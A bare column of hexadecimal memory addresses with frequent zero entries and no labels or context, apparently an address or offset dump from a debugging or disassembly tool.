                                                                          0x013d794c
                                                                          0x013d794e
                                                                          0x013d7950
                                                                          0x013d7957
                                                                          0x013d7957
                                                                          0x013d795a
                                                                          0x013d795d
                                                                          0x013d795f
                                                                          0x013d795f
                                                                          0x013d7961
                                                                          0x013d7965
                                                                          0x013d796c
                                                                          0x013d7970
                                                                          0x013d7970
                                                                          0x013d7974
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7976
                                                                          0x013d7979
                                                                          0x013d797b
                                                                          0x013d797c
                                                                          0x013d7981
                                                                          0x013d7986
                                                                          0x013d798b
                                                                          0x013d7990
                                                                          0x013d7993
                                                                          0x013d7998
                                                                          0x013d799b
                                                                          0x013d799e
                                                                          0x013d79a1
                                                                          0x013d79a5
                                                                          0x013d79a8
                                                                          0x013d79a9
                                                                          0x013d79ac
                                                                          0x013d79af
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d79af
                                                                          0x013d79b1
                                                                          0x013d79b6
                                                                          0x013d79bb
                                                                          0x013d79c0
                                                                          0x013d79c5
                                                                          0x013d79c8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d79dc
                                                                          0x013d79e1
                                                                          0x013d79eb
                                                                          0x013d79f0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d79ff
                                                                          0x013d7a04
                                                                          0x013d7a09
                                                                          0x013d7a10
                                                                          0x013d7a15
                                                                          0x013d7a1a
                                                                          0x013d7a24
                                                                          0x013d7a29
                                                                          0x013d7a2e
                                                                          0x013d7a38
                                                                          0x013d7a40
                                                                          0x013d7a42
                                                                          0x013d7a44
                                                                          0x013d7a49
                                                                          0x013d7a49
                                                                          0x013d7a4b
                                                                          0x013d7a50
                                                                          0x013d7a53
                                                                          0x013d7a55
                                                                          0x013d7a56
                                                                          0x013d7a5b
                                                                          0x013d7a65
                                                                          0x013d7a6c
                                                                          0x013d7a6f
                                                                          0x013d7a72
                                                                          0x013d7a73
                                                                          0x013d7a78
                                                                          0x013d7a7d
                                                                          0x013d7a7f
                                                                          0x013d7a82
                                                                          0x013d7a87
                                                                          0x013d7a87
                                                                          0x013d7a89
                                                                          0x013d7a8e
                                                                          0x013d7a91
                                                                          0x013d7a93
                                                                          0x013d7a94
                                                                          0x013d7a9e
                                                                          0x013d7aa3
                                                                          0x013d7aa5
                                                                          0x013d7aa7
                                                                          0x013d7aaa
                                                                          0x013d7aac
                                                                          0x013d7ab1
                                                                          0x013d7ab3
                                                                          0x013d7ab5
                                                                          0x013d7ab6
                                                                          0x013d7abb
                                                                          0x013d7ac0
                                                                          0x013d7ac5
                                                                          0x013d7acf
                                                                          0x013d7ad4
                                                                          0x013d7ad7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7ae6
                                                                          0x013d7aeb
                                                                          0x013d7af0
                                                                          0x013d7afa
                                                                          0x013d7aff
                                                                          0x013d7b04
                                                                          0x013d7b05
                                                                          0x013d7b08
                                                                          0x013d7b0e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7b0e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7eb0
                                                                          0x013d7eb1
                                                                          0x013d7eb6
                                                                          0x013d7eb9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7f5b
                                                                          0x013d7f60
                                                                          0x013d7f62
                                                                          0x013d7f67
                                                                          0x013d7f67
                                                                          0x013d7f69
                                                                          0x013d7fa8
                                                                          0x013d7fa8
                                                                          0x013d7fa9
                                                                          0x013d7faa
                                                                          0x013d7fab
                                                                          0x00000000
                                                                          0x013d7f6b
                                                                          0x013d7f6b
                                                                          0x013d7f6b
                                                                          0x013d7f6d
                                                                          0x013d7fac
                                                                          0x013d7fac
                                                                          0x013d7fad
                                                                          0x013d7fae
                                                                          0x013d7faf
                                                                          0x013d7fb0
                                                                          0x013d7fb1
                                                                          0x013d7fb3
                                                                          0x00000000
                                                                          0x013d7f6f
                                                                          0x013d7f6f
                                                                          0x013d7f6f
                                                                          0x013d7f6f
                                                                          0x013d7f74
                                                                          0x013d7f75
                                                                          0x013d7fb4
                                                                          0x013d7fb4
                                                                          0x013d7fb5
                                                                          0x013d7fbb
                                                                          0x013d7fbb
                                                                          0x00000000
                                                                          0x013d7f77
                                                                          0x013d7f77
                                                                          0x013d7f77
                                                                          0x013d7f7d
                                                                          0x013d7fbc
                                                                          0x013d7fbc
                                                                          0x013d7fbd
                                                                          0x013d7fbe
                                                                          0x00000000
                                                                          0x013d7fc0
                                                                          0x013d7fc0
                                                                          0x00000000
                                                                          0x013d7fc2
                                                                          0x013d7fc2
                                                                          0x013d7fc3
                                                                          0x00000000
                                                                          0x013d7fc3
                                                                          0x013d7fc0
                                                                          0x013d7f7f
                                                                          0x013d7f7f
                                                                          0x013d7f7f
                                                                          0x013d7f7f
                                                                          0x013d7f85
                                                                          0x013d7fc4
                                                                          0x013d7fc4
                                                                          0x00000000
                                                                          0x013d7fc6
                                                                          0x013d7fc6
                                                                          0x00000000
                                                                          0x013d7fc6
                                                                          0x013d7f87
                                                                          0x013d7f87
                                                                          0x013d7f87
                                                                          0x013d7f87
                                                                          0x013d7f89
                                                                          0x013d7f89
                                                                          0x013d7fc8
                                                                          0x013d7fc8
                                                                          0x013d7fce
                                                                          0x00000000
                                                                          0x013d7f8b
                                                                          0x013d7f8b
                                                                          0x013d7f8b
                                                                          0x013d7f8b
                                                                          0x013d7f91
                                                                          0x013d7fd0
                                                                          0x013d7fd0
                                                                          0x013d7fd3
                                                                          0x00000000
                                                                          0x013d7f93
                                                                          0x013d7f93
                                                                          0x013d7f93
                                                                          0x013d7f95
                                                                          0x013d7fd4
                                                                          0x013d7fd4
                                                                          0x013d7fd6
                                                                          0x013d7fd6
                                                                          0x013d7fda
                                                                          0x00000000
                                                                          0x013d7fdc
                                                                          0x013d7fdc
                                                                          0x013d7fdf
                                                                          0x00000000
                                                                          0x013d7fdf
                                                                          0x013d7f97
                                                                          0x013d7f97
                                                                          0x013d7f9a
                                                                          0x013d7f9f
                                                                          0x013d7f9f
                                                                          0x013d7fa1
                                                                          0x013d7fe0
                                                                          0x013d7fe0
                                                                          0x013d7fe2
                                                                          0x013d7fe9
                                                                          0x013d7fec
                                                                          0x013d7fee
                                                                          0x013d7ff0
                                                                          0x013d7ff2
                                                                          0x013d7ff4
                                                                          0x013d7ff6
                                                                          0x013d7ff8
                                                                          0x013d7ffa
                                                                          0x013d7ffa
                                                                          0x013d7ffb
                                                                          0x013d7ffd
                                                                          0x013d7ffd
                                                                          0x013d8000
                                                                          0x013d8000
                                                                          0x013d8006
                                                                          0x013d800a
                                                                          0x013d800f
                                                                          0x013d8013
                                                                          0x013d8015
                                                                          0x013d8017
                                                                          0x013d801a
                                                                          0x013d801b
                                                                          0x013d801b
                                                                          0x013d801b
                                                                          0x013d801c
                                                                          0x013d8022
                                                                          0x013d8022
                                                                          0x013d8022
                                                                          0x013d8023
                                                                          0x013d8023
                                                                          0x013d8024
                                                                          0x013d8029
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d802b
                                                                          0x013d803b
                                                                          0x013d804a
                                                                          0x013d804a
                                                                          0x013d7ffb
                                                                          0x013d7fa3
                                                                          0x013d7fa3
                                                                          0x013d7fa6
                                                                          0x00000000
                                                                          0x013d7fa6
                                                                          0x013d7fa1
                                                                          0x013d7f95
                                                                          0x013d7f91
                                                                          0x013d7f89
                                                                          0x013d7f85
                                                                          0x013d7f7d
                                                                          0x013d7f75
                                                                          0x013d7f6d
                                                                          0x013d8050
                                                                          0x013d8056
                                                                          0x013d805b
                                                                          0x013d8060
                                                                          0x013d806a
                                                                          0x013d806f
                                                                          0x013d8074
                                                                          0x013d807e
                                                                          0x013d8083
                                                                          0x013d808c
                                                                          0x013d8091
                                                                          0x013d8096
                                                                          0x013d80a0
                                                                          0x013d80a5
                                                                          0x013d80ae
                                                                          0x013d80b3
                                                                          0x013d80b8
                                                                          0x013d80c2
                                                                          0x013d80c7
                                                                          0x013d80d0
                                                                          0x013d80da
                                                                          0x013d80db
                                                                          0x013d80e0
                                                                          0x013d80e3
                                                                          0x013d80e6
                                                                          0x013d80e9
                                                                          0x013d811d
                                                                          0x013d8122
                                                                          0x013d8127
                                                                          0x013d812c
                                                                          0x013d8136
                                                                          0x013d813b
                                                                          0x013d8140
                                                                          0x013d814a
                                                                          0x013d814f
                                                                          0x013d8154
                                                                          0x013d815e
                                                                          0x013d8163
                                                                          0x013d8168
                                                                          0x013d8172
                                                                          0x013d8177
                                                                          0x013d8180
                                                                          0x013d8185
                                                                          0x013d818a
                                                                          0x013d8194
                                                                          0x013d8199
                                                                          0x013d81a2
                                                                          0x013d81a7
                                                                          0x013d81ac
                                                                          0x013d81b6
                                                                          0x013d81bb
                                                                          0x013d81c4
                                                                          0x013d81ce
                                                                          0x013d81cf
                                                                          0x013d81d4
                                                                          0x013d81d7
                                                                          0x013d81da
                                                                          0x013d81dd
                                                                          0x013d80eb
                                                                          0x013d80eb
                                                                          0x013d80ee
                                                                          0x013d80f1
                                                                          0x013d80f8
                                                                          0x013d80f8
                                                                          0x013d80fb
                                                                          0x00000000
                                                                          0x013d80fd
                                                                          0x013d80fd
                                                                          0x013d8100
                                                                          0x00000000
                                                                          0x013d8102
                                                                          0x013d8102
                                                                          0x013d8105
                                                                          0x013d810a
                                                                          0x013d810c
                                                                          0x013d810f
                                                                          0x00000000
                                                                          0x013d8111
                                                                          0x013d8111
                                                                          0x013d8117
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8117
                                                                          0x013d810f
                                                                          0x013d8100
                                                                          0x013d80f3
                                                                          0x013d80f3
                                                                          0x013d80f6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d80f6
                                                                          0x013d80f1
                                                                          0x013d81e0
                                                                          0x013d81e3
                                                                          0x013d820d
                                                                          0x013d820d
                                                                          0x013d8212
                                                                          0x013d821c
                                                                          0x013d8221
                                                                          0x013d8223
                                                                          0x013d8228
                                                                          0x013d8232
                                                                          0x013d8237
                                                                          0x013d8239
                                                                          0x013d823e
                                                                          0x013d8248
                                                                          0x013d824d
                                                                          0x013d824f
                                                                          0x013d8254
                                                                          0x013d825e
                                                                          0x013d8263
                                                                          0x013d8265
                                                                          0x013d826a
                                                                          0x013d8274
                                                                          0x013d8279
                                                                          0x013d827c
                                                                          0x013d8282
                                                                          0x013d8285
                                                                          0x013d8288
                                                                          0x013d81e5
                                                                          0x013d81e5
                                                                          0x013d81e8
                                                                          0x013d81ef
                                                                          0x013d81ef
                                                                          0x013d81f2
                                                                          0x00000000
                                                                          0x013d81f4
                                                                          0x013d81f4
                                                                          0x013d81f7
                                                                          0x00000000
                                                                          0x013d81f9
                                                                          0x013d81f9
                                                                          0x013d81fe
                                                                          0x013d8200
                                                                          0x013d8203
                                                                          0x00000000
                                                                          0x013d8205
                                                                          0x013d8205
                                                                          0x013d820b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d820b
                                                                          0x013d8203
                                                                          0x013d81f7
                                                                          0x013d81ea
                                                                          0x013d81ea
                                                                          0x013d81ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d81ed
                                                                          0x013d81e8
                                                                          0x013d8290
                                                                          0x013d8296
                                                                          0x013d829b
                                                                          0x013d82a1
                                                                          0x013d82a6
                                                                          0x013d82ab
                                                                          0x013d82b5
                                                                          0x013d82ba
                                                                          0x013d82bf
                                                                          0x013d82c9
                                                                          0x013d82ce
                                                                          0x013d82d3
                                                                          0x013d82dd
                                                                          0x013d82e2
                                                                          0x013d82e7
                                                                          0x013d82f1
                                                                          0x013d82fb
                                                                          0x013d82fc
                                                                          0x013d8301
                                                                          0x013d8306
                                                                          0x013d8315
                                                                          0x013d831a
                                                                          0x013d831f
                                                                          0x013d8324
                                                                          0x013d8333
                                                                          0x013d8342
                                                                          0x013d834a
                                                                          0x013d834b
                                                                          0x013d834d
                                                                          0x013d8350
                                                                          0x013d8350
                                                                          0x013d8355
                                                                          0x013d8356
                                                                          0x013d8358
                                                                          0x013d835a
                                                                          0x013d835f
                                                                          0x013d8364
                                                                          0x013d8367
                                                                          0x013d836a
                                                                          0x013d836d
                                                                          0x013d837c
                                                                          0x013d837f
                                                                          0x00000000
                                                                          0x013d8381
                                                                          0x013d8381
                                                                          0x013d8384
                                                                          0x013d8387
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8387
                                                                          0x013d836f
                                                                          0x013d836f
                                                                          0x013d8372
                                                                          0x013d8375
                                                                          0x013d8389
                                                                          0x013d8389
                                                                          0x013d8390
                                                                          0x013d8393
                                                                          0x013d8394
                                                                          0x013d8399
                                                                          0x013d839a
                                                                          0x013d839b
                                                                          0x013d83a0
                                                                          0x013d83a3
                                                                          0x013d83a6
                                                                          0x013d83a9
                                                                          0x013d83bb
                                                                          0x013d83bb
                                                                          0x013d83be
                                                                          0x00000000
                                                                          0x013d83c0
                                                                          0x013d83c0
                                                                          0x013d83c3
                                                                          0x013d83c6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d83c6
                                                                          0x013d83ab
                                                                          0x013d83ab
                                                                          0x013d83ae
                                                                          0x013d83ae
                                                                          0x013d83b1
                                                                          0x013d83c8
                                                                          0x013d83c8
                                                                          0x013d83cf
                                                                          0x013d83d2
                                                                          0x013d83d3
                                                                          0x013d83d8
                                                                          0x013d83d9
                                                                          0x013d83da
                                                                          0x013d83df
                                                                          0x013d83e2
                                                                          0x013d83e5
                                                                          0x013d83e8
                                                                          0x013d83fa
                                                                          0x013d83fa
                                                                          0x013d83fd
                                                                          0x00000000
                                                                          0x013d83ff
                                                                          0x013d83ff
                                                                          0x013d8402
                                                                          0x013d8405
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8405
                                                                          0x013d83ea
                                                                          0x013d83ea
                                                                          0x013d83ed
                                                                          0x013d83ed
                                                                          0x013d83f0
                                                                          0x013d8407
                                                                          0x013d8407
                                                                          0x013d840e
                                                                          0x013d8411
                                                                          0x013d8412
                                                                          0x013d8417
                                                                          0x013d8418
                                                                          0x013d8419
                                                                          0x013d841e
                                                                          0x013d8421
                                                                          0x013d8424
                                                                          0x013d8427
                                                                          0x013d8439
                                                                          0x013d8439
                                                                          0x013d843c
                                                                          0x00000000
                                                                          0x013d843e
                                                                          0x013d843e
                                                                          0x013d8441
                                                                          0x013d8444
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8444
                                                                          0x013d8429
                                                                          0x013d8429
                                                                          0x013d842c
                                                                          0x013d842c
                                                                          0x013d842f
                                                                          0x013d8446
                                                                          0x013d8446
                                                                          0x013d844d
                                                                          0x013d8450
                                                                          0x013d8451
                                                                          0x013d8456
                                                                          0x013d8457
                                                                          0x013d8458
                                                                          0x013d845d
                                                                          0x013d8460
                                                                          0x013d8463
                                                                          0x013d8466
                                                                          0x013d8478
                                                                          0x013d8478
                                                                          0x013d847b
                                                                          0x00000000
                                                                          0x013d847d
                                                                          0x013d847d
                                                                          0x013d8480
                                                                          0x013d8483
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8483
                                                                          0x013d8468
                                                                          0x013d8468
                                                                          0x013d846b
                                                                          0x013d846b
                                                                          0x013d846e
                                                                          0x013d8485
                                                                          0x013d8485
                                                                          0x013d848c
                                                                          0x013d848f
                                                                          0x013d8490
                                                                          0x013d8495
                                                                          0x013d8496
                                                                          0x013d8497
                                                                          0x013d849c
                                                                          0x013d849f
                                                                          0x013d84a2
                                                                          0x013d84a5
                                                                          0x013d84b7
                                                                          0x013d84b7
                                                                          0x013d84ba
                                                                          0x00000000
                                                                          0x013d84bc
                                                                          0x013d84bc
                                                                          0x013d84bf
                                                                          0x013d84c2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d84c2
                                                                          0x013d84a7
                                                                          0x013d84a7
                                                                          0x013d84aa
                                                                          0x013d84aa
                                                                          0x013d84ad
                                                                          0x013d84c4
                                                                          0x013d84c4
                                                                          0x013d84cb
                                                                          0x013d84ce
                                                                          0x013d84cf
                                                                          0x013d84d4
                                                                          0x013d84d5
                                                                          0x013d84d6
                                                                          0x013d84db
                                                                          0x013d84de
                                                                          0x013d84e1
                                                                          0x013d84e4
                                                                          0x013d84f6
                                                                          0x013d84f6
                                                                          0x013d84f9
                                                                          0x00000000
                                                                          0x013d84fb
                                                                          0x013d84fb
                                                                          0x013d84fe
                                                                          0x013d8501
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8501
                                                                          0x013d84e6
                                                                          0x013d84e6
                                                                          0x013d84e9
                                                                          0x013d84e9
                                                                          0x013d84ec
                                                                          0x013d8503
                                                                          0x013d8503
                                                                          0x013d850a
                                                                          0x013d8515
                                                                          0x013d851a
                                                                          0x013d851d
                                                                          0x013d8520
                                                                          0x013d8523
                                                                          0x013d8535
                                                                          0x013d8535
                                                                          0x013d8538
                                                                          0x00000000
                                                                          0x013d853a
                                                                          0x013d853a
                                                                          0x013d853d
                                                                          0x013d8540
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8540
                                                                          0x013d8525
                                                                          0x013d8525
                                                                          0x013d8528
                                                                          0x013d8528
                                                                          0x013d852b
                                                                          0x013d8542
                                                                          0x013d8542
                                                                          0x013d8549
                                                                          0x013d854c
                                                                          0x013d854d
                                                                          0x013d8552
                                                                          0x013d8553
                                                                          0x013d8554
                                                                          0x013d8559
                                                                          0x013d855c
                                                                          0x013d855f
                                                                          0x013d8562
                                                                          0x013d8574
                                                                          0x013d8574
                                                                          0x013d8577
                                                                          0x00000000
                                                                          0x013d8579
                                                                          0x013d8579
                                                                          0x013d857c
                                                                          0x013d857f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d857f
                                                                          0x013d8564
                                                                          0x013d8564
                                                                          0x013d8567
                                                                          0x013d8567
                                                                          0x013d856a
                                                                          0x013d8581
                                                                          0x013d8581
                                                                          0x013d8588
                                                                          0x013d858b
                                                                          0x013d858c
                                                                          0x013d8591
                                                                          0x013d8592
                                                                          0x013d8593
                                                                          0x013d8598
                                                                          0x013d859b
                                                                          0x013d859e
                                                                          0x013d85a1
                                                                          0x013d85b3
                                                                          0x013d85b3
                                                                          0x013d85b6
                                                                          0x00000000
                                                                          0x013d85b8
                                                                          0x013d85b8
                                                                          0x013d85bb
                                                                          0x013d85be
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d85be
                                                                          0x013d85a3
                                                                          0x013d85a3
                                                                          0x013d85a6
                                                                          0x013d85a6
                                                                          0x013d85a9
                                                                          0x013d85c0
                                                                          0x013d85c0
                                                                          0x013d85c7
                                                                          0x013d85ca
                                                                          0x013d85cb
                                                                          0x013d85d0
                                                                          0x013d85d1
                                                                          0x013d85d2
                                                                          0x013d85d7
                                                                          0x013d85da
                                                                          0x013d85dd
                                                                          0x013d85e0
                                                                          0x013d85f2
                                                                          0x013d85f2
                                                                          0x013d85f5
                                                                          0x00000000
                                                                          0x013d85f7
                                                                          0x013d85f7
                                                                          0x013d85fa
                                                                          0x013d85fd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d85fd
                                                                          0x013d85e2
                                                                          0x013d85e2
                                                                          0x013d85e5
                                                                          0x013d85e5
                                                                          0x013d85e8
                                                                          0x013d85ff
                                                                          0x013d85ff
                                                                          0x013d8606
                                                                          0x013d8609
                                                                          0x013d860a
                                                                          0x013d860f
                                                                          0x013d8610
                                                                          0x013d8611
                                                                          0x013d8616
                                                                          0x013d8619
                                                                          0x013d861c
                                                                          0x013d861f
                                                                          0x013d8631
                                                                          0x013d8631
                                                                          0x013d8634
                                                                          0x013d8636
                                                                          0x00000000
                                                                          0x013d8636
                                                                          0x00000000
                                                                          0x013d8621
                                                                          0x013d8621
                                                                          0x013d8624
                                                                          0x013d8624
                                                                          0x013d8627
                                                                          0x00000000
                                                                          0x013d8629
                                                                          0x013d8629
                                                                          0x013d8629
                                                                          0x013d862e
                                                                          0x013d862e
                                                                          0x013d8627
                                                                          0x013d85ea
                                                                          0x013d85ea
                                                                          0x013d85ea
                                                                          0x013d85ef
                                                                          0x013d85ef
                                                                          0x013d85e8
                                                                          0x013d85ab
                                                                          0x013d85ab
                                                                          0x013d85ab
                                                                          0x013d85b0
                                                                          0x013d85b0
                                                                          0x013d85a9
                                                                          0x013d856c
                                                                          0x013d856c
                                                                          0x013d856c
                                                                          0x013d8571
                                                                          0x013d8571
                                                                          0x013d856a
                                                                          0x013d852d
                                                                          0x013d852d
                                                                          0x013d852d
                                                                          0x013d8532
                                                                          0x013d8532
                                                                          0x013d852b
                                                                          0x013d84ee
                                                                          0x013d84ee
                                                                          0x013d84ee
                                                                          0x013d84f3
                                                                          0x013d84f3
                                                                          0x013d84ec
                                                                          0x013d84af
                                                                          0x013d84af
                                                                          0x013d84af
                                                                          0x013d84b4
                                                                          0x013d84b4
                                                                          0x013d84ad
                                                                          0x013d8470
                                                                          0x013d8470
                                                                          0x013d8470
                                                                          0x013d8475
                                                                          0x013d8475
                                                                          0x013d846e
                                                                          0x013d8431
                                                                          0x013d8431
                                                                          0x013d8431
                                                                          0x013d8436
                                                                          0x013d8436
                                                                          0x013d842f
                                                                          0x013d83f2
                                                                          0x013d83f2
                                                                          0x013d83f2
                                                                          0x013d83f7
                                                                          0x013d83f7
                                                                          0x013d83f0
                                                                          0x013d83b3
                                                                          0x013d83b3
                                                                          0x013d83b3
                                                                          0x013d83b8
                                                                          0x013d83b8
                                                                          0x013d83b1
                                                                          0x013d8377
                                                                          0x013d8639
                                                                          0x013d8639
                                                                          0x013d863c
                                                                          0x013d863e
                                                                          0x013d863e
                                                                          0x013d8645
                                                                          0x013d8648
                                                                          0x013d8649
                                                                          0x013d864e
                                                                          0x013d864f
                                                                          0x013d8650
                                                                          0x013d8655
                                                                          0x013d8655
                                                                          0x013d8658
                                                                          0x013d8658
                                                                          0x013d8658
                                                                          0x013d865d
                                                                          0x013d865d
                                                                          0x013d8375
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7b15
                                                                          0x013d7b1f
                                                                          0x013d7b24
                                                                          0x013d7b29
                                                                          0x013d7b2b
                                                                          0x013d7b30
                                                                          0x013d7b35
                                                                          0x013d7b3f
                                                                          0x013d7b44
                                                                          0x013d7b4e
                                                                          0x013d7b51
                                                                          0x013d7b52
                                                                          0x013d7b53
                                                                          0x013d7b54
                                                                          0x013d7b55
                                                                          0x013d7b5a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7b62
                                                                          0x013d7b6c
                                                                          0x013d7b71
                                                                          0x013d7b76
                                                                          0x013d7b78
                                                                          0x013d7b7d
                                                                          0x013d7b82
                                                                          0x013d7b8c
                                                                          0x013d7b91
                                                                          0x013d7b96
                                                                          0x013d7b9b
                                                                          0x013d7b9e
                                                                          0x013d7b9f
                                                                          0x013d7ba0
                                                                          0x013d7ba1
                                                                          0x013d7ba2
                                                                          0x013d7ba7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7baf
                                                                          0x013d7bb9
                                                                          0x013d7bbe
                                                                          0x013d7bc3
                                                                          0x013d7bc5
                                                                          0x013d7bca
                                                                          0x013d7bcf
                                                                          0x013d7bd9
                                                                          0x013d7bde
                                                                          0x013d7be3
                                                                          0x013d7be8
                                                                          0x013d7beb
                                                                          0x013d7bec
                                                                          0x013d7bed
                                                                          0x013d7bee
                                                                          0x013d7bef
                                                                          0x013d7bf4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7bfc
                                                                          0x013d7c06
                                                                          0x013d7c0b
                                                                          0x013d7c10
                                                                          0x013d7c12
                                                                          0x013d7c17
                                                                          0x013d7c1c
                                                                          0x013d7c26
                                                                          0x013d7c2b
                                                                          0x013d7c35
                                                                          0x013d7c38
                                                                          0x013d7c39
                                                                          0x013d7c3a
                                                                          0x013d7c3b
                                                                          0x013d7c3c
                                                                          0x013d7c41
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7c49
                                                                          0x013d7c53
                                                                          0x013d7c58
                                                                          0x013d7c5d
                                                                          0x013d7c5f
                                                                          0x013d7c64
                                                                          0x013d7c69
                                                                          0x013d7c73
                                                                          0x013d7c78
                                                                          0x013d7c7d
                                                                          0x013d7c82
                                                                          0x013d7c85
                                                                          0x013d7c86
                                                                          0x013d7c87
                                                                          0x013d7c88
                                                                          0x013d7c89
                                                                          0x013d7c8e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7c96
                                                                          0x013d7ca0
                                                                          0x013d7ca5
                                                                          0x013d7caa
                                                                          0x013d7cac
                                                                          0x013d7cb1
                                                                          0x013d7cb6
                                                                          0x013d7cc0
                                                                          0x013d7cc5
                                                                          0x013d7cca
                                                                          0x013d7ccf
                                                                          0x013d7cd2
                                                                          0x013d7cd3
                                                                          0x013d7cd4
                                                                          0x013d7cd5
                                                                          0x013d7cd6
                                                                          0x013d7cdb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7ce3
                                                                          0x013d7ced
                                                                          0x013d7cf2
                                                                          0x013d7cf7
                                                                          0x013d7cf9
                                                                          0x013d7cfe
                                                                          0x013d7d03
                                                                          0x013d7d0d
                                                                          0x013d7d12
                                                                          0x013d7d1c
                                                                          0x013d7d1f
                                                                          0x013d7d20
                                                                          0x013d7d21
                                                                          0x013d7d22
                                                                          0x013d7d23
                                                                          0x013d7d28
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7d30
                                                                          0x013d7d3a
                                                                          0x013d7d3f
                                                                          0x013d7d44
                                                                          0x013d7d46
                                                                          0x013d7d4b
                                                                          0x013d7d50
                                                                          0x013d7d5a
                                                                          0x013d7d5f
                                                                          0x013d7d64
                                                                          0x013d7d69
                                                                          0x013d7d6c
                                                                          0x013d7d6d
                                                                          0x013d7d6e
                                                                          0x013d7d6f
                                                                          0x013d7d70
                                                                          0x013d7d75
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7d7d
                                                                          0x013d7d87
                                                                          0x013d7d8c
                                                                          0x013d7d91
                                                                          0x013d7d93
                                                                          0x013d7d98
                                                                          0x013d7d9d
                                                                          0x013d7da7
                                                                          0x013d7dac
                                                                          0x013d7db1
                                                                          0x013d7db6
                                                                          0x013d7db9
                                                                          0x013d7dba
                                                                          0x013d7dbb
                                                                          0x013d7dbc
                                                                          0x013d7dbd
                                                                          0x013d7dc2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7dca
                                                                          0x013d7dd4
                                                                          0x013d7dd9
                                                                          0x013d7dde
                                                                          0x013d7de0
                                                                          0x013d7de5
                                                                          0x013d7dea
                                                                          0x013d7df4
                                                                          0x013d7df9
                                                                          0x013d7e03
                                                                          0x013d7e06
                                                                          0x013d7e07
                                                                          0x013d7e08
                                                                          0x013d7e09
                                                                          0x013d7e0a
                                                                          0x013d7e0f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7e17
                                                                          0x013d7e21
                                                                          0x013d7e26
                                                                          0x013d7e2b
                                                                          0x013d7e2d
                                                                          0x013d7e32
                                                                          0x013d7e37
                                                                          0x013d7e41
                                                                          0x013d7e46
                                                                          0x013d7e4b
                                                                          0x013d7e50
                                                                          0x013d7e53
                                                                          0x013d7e54
                                                                          0x013d7e55
                                                                          0x013d7e56
                                                                          0x013d7e57
                                                                          0x013d7e5c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7e61
                                                                          0x013d7e6b
                                                                          0x013d7e70
                                                                          0x013d7e75
                                                                          0x013d7e77
                                                                          0x013d7e7c
                                                                          0x013d7e81
                                                                          0x013d7e8b
                                                                          0x013d7e90
                                                                          0x013d7e95
                                                                          0x013d7e9a
                                                                          0x013d7e9d
                                                                          0x013d7e9e
                                                                          0x013d7e9f
                                                                          0x013d7ea0
                                                                          0x013d7ea1
                                                                          0x013d7ea6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7ebe
                                                                          0x013d7ec3
                                                                          0x013d7ec8
                                                                          0x013d7ec9
                                                                          0x013d7ece
                                                                          0x013d7ed8
                                                                          0x013d7edd
                                                                          0x013d7ee0
                                                                          0x013d7ee1
                                                                          0x013d7ee6
                                                                          0x013d7ef0
                                                                          0x013d7ef5
                                                                          0x013d7ef9
                                                                          0x013d7f08
                                                                          0x013d7f09
                                                                          0x013d7f0e
                                                                          0x013d7f13
                                                                          0x013d7f16
                                                                          0x013d7f1b
                                                                          0x013d7f22
                                                                          0x013d7f29
                                                                          0x013d7f30
                                                                          0x013d7f35
                                                                          0x013d7f36
                                                                          0x013d7f36
                                                                          0x013d7f3f
                                                                          0x00000000
                                                                          0x013d7f3f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7374
                                                                          0x013d737e
                                                                          0x013d7383
